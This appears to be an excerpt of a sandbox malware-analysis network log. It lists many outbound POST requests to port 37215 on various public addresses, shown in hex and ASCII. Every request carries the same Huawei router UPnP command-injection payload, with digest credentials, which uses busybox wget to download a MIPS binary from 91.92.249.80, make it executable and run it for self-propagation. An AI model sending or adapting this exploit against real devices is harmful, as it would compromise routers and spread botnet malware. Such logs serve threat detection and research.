                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1098192.168.2.2355250157.86.86.17537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299062014 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1099192.168.2.234603068.73.70.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299067974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1100192.168.2.2357094152.197.214.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299093008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1101192.168.2.2337728197.187.234.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299124002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1102192.168.2.2336686197.186.24.9537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299151897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1103192.168.2.2349054117.122.91.6437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299187899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1104192.168.2.2341366157.212.60.8537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299218893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1105192.168.2.234796041.207.223.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299220085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1106192.168.2.2343308197.4.61.5137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299236059 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1107192.168.2.2360096197.219.1.12237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.299242020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
